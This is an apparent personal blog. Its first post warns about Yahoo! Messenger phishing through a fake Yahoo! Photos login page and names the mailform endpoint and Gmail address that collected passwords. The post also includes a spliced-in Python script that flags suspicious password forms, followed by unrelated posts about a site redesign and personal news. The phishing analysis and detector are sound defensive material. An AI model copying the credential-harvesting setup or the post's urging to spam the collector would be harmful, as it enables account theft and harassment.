Phishing Warning

Yahoo! accounts are being cracked … with your permission.

I’ve just received two phishing attempts from two of my bloggermates in my Yahoo! Messenger contact list. I guess their accounts were being hacked at the time I received those messages, so I want to warn those of you who want to protect your accounts.

For those who do not know, phishing literally means fishing [for passwords], as the letter f is usually replaced by ph in 13375p34k. Another definition could be password harvesting or fishing.

There are many methods of phishing, usually through email that, most probably, goes directly to your spam folder [if you have one]. But attacks through YM or any other IM account, which really look like your friends are referring you to a site, are somehow really mind-controlling.

The method I’ve encountered used a spoof of the Yahoo! Photos Web site inside a Yahoo! Geocities Web page that requires you to sign in with your username and password, in an attempt to trick you into believing that your friends’ photos will be shown after you log in. Please take note that Yahoo! Geocities Web pages are user-controlled, meaning that someone other than Yahoo! made that Web page.

The two URIs that were given to me were:

Apparently, the two sites that were IMed to me have already been reported and taken down. Others may still be out there [or are currently being made], so please keep watching out.

Note: Do NOT enter your login details there.

If you take a look at the page source of both main frames (the frames with the sign-in page displayed), you will see that the form input goes to a mailform (http://www2.fiberbit.net/form/mailto.cgi), and both use the same email address input, smoke.beer@gmail.com. (Now, spam that bastard!) It just means that your login information will go to his GMail inbox.

The primary solution to this lies with you. You should basically:

  • Never trust login forms inside a frame of a user-controlled Web page.
  • Try to log in directly from the site, over a secure (HTTPS) connection if possible. (e.g., Yahoo! Login, Google Accounts)
  • Never trust friends’ URI referrals unless you really know the site or have checked for security flaws/issues.
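The source inspection described above and the first two checks in this list can be automated. The following is an added example, not code from the original post: it parses a page, finds every form that asks for a password, and warns when the form submits over plain HTTP, to a host outside a trusted list, or carries a hidden field with a mail recipient. The sample page URL, the field names and the trusted-host list are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Constructed sample; the field names and the page URL are assumptions.
SAMPLE_PAGE_URL = "http://user-page.example/photos.html"
SAMPLE_HTML = """
<form method="post" action="http://www2.fiberbit.net/form/mailto.cgi">
  <input type="hidden" name="recipient" value="smoke.beer@gmail.com">
  <input type="text" name="login">
  <input type="password" name="passwd">
</form>
"""

class FormCollector(HTMLParser):
    """Record every <form> with its action and the attributes of its inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append({"action": attrs.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(attrs)

def audit_login_forms(html, page_url, trusted_hosts):
    """Return warnings for each form on the page that asks for a password."""
    collector = FormCollector()
    collector.feed(html)
    warnings = []
    for form in collector.forms:
        kinds = [(i.get("type") or "text").lower() for i in form["inputs"]]
        if "password" not in kinds:
            continue  # only credential-collecting forms matter here
        # A relative or empty action resolves against the page's own URL.
        target = urlparse(urljoin(page_url, form["action"]))
        if target.scheme != "https":
            warnings.append(f"password sent over {target.scheme}, not https")
        if target.hostname not in trusted_hosts:
            warnings.append(f"password sent to untrusted host {target.hostname}")
        for field, kind in zip(form["inputs"], kinds):
            match = EMAIL_RE.search(field.get("value") or "")
            if kind == "hidden" and match:
                warnings.append(f"hidden field mails the form to {match.group()}")
    return warnings

if __name__ == "__main__":
    print("\n".join(audit_login_forms(SAMPLE_HTML, SAMPLE_PAGE_URL, {"login.yahoo.com"})))
```

A form served from and posting to the trusted host over HTTPS produces no warnings, while the constructed sample triggers all three.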

I know I haven’t fully discussed what could be done to prevent such intrusions into your accounts; you might even want to change your passwords regularly. Just remember to be aware of such possibilities when visiting untrusted Web sites. Or else, you may be giving them permission to hack you.

Fast Pace in Slow Motion

I have a new layout, everybody. Obviously. I hope this one won’t turn out dull like the second version. I have a reason for that static title; maybe I’ll tell you a little later. I’ve worked on this for four weeks. Yes, four weeks! I got so busy with many things but fortunately, one [this] is finished. Now, I have more time for the others.

This is somehow broken in Internet Explorer. And, I am in no mood for hacking CSS yet again for that pesky browser. Get Firefox! I’ve been telling you for years! The upcoming Windows IE7, which is already downloadable in Beta, is still no match for it—at least for me.

There are a few somethings still lacking from this Web site. Just as a checklist, it includes:

Maybe I’d just post the story behind the title in the Site Information page. I really can’t think right and write right right now. See? 😆

So much work, so little time

One word: über-busy.

I’ve just realized having so many dreams and interests could really stress a person out—well, at least for me. Well, after two weeks of unannounced hiatus, I could finally tell you some news.

  1. I’ve got the Head position in the Web & Technical Committee of the Engineering Student Council. Wish me good luck on this, guys. It’s so much work I haven’t imagined. I’ve only applied for the Assistant Head position, but after two chosen candidates [for the Head] declined, they picked me. Many projects to come. 🙂
  2. I got accepted to work on XHTMLized. Current project: none. I’ve got to finish ESC work first. 😀
  3. My Princess got a blog! And, I write here, too. Please read: Mixed to Perfection. Thank you! Shoutout: I love you, Princess!
  4. My interest in spreading Web standards could possibly be official. Though up to now it still isn’t, I’ve already told Molly that I’m interested in joining the International Liaison Group of The Web Standards Project. I hope other Filipinos come and join. This would be a great opportunity for everyone who’s into standards. 🙂

I know I am forgetting something. Haha! It would just have to be on the next entry. I have to start making my project proposals and the projects themselves. Until next time!

[Photo: Raindrops on my car window. North Luzon Expressway, 6 May 2006.]

Oh yes! I remember: I’ve already gone out swimming with the Tan Clan (my mother’s side of the family). I’ve got only a handful of photos because it was so much fun being in water after so many days of extreme heat exhaustion. Ironically, it rained so heavily the afternoon we were coming home from the province. *sweatdrop*

BTW, I finished my upcoming layout about a week ago. It’s the content that is lacking—about eight user pages are still unfinished, but the WordPress layout is done. I don’t want to activate it just yet because I think I have the tendency not to continue its development if I implement the design so early. Well, I may ask you though: “Finish it first!” or “I want the new design now!”? 😛

Back to work, now. One by one by one by one … 🙂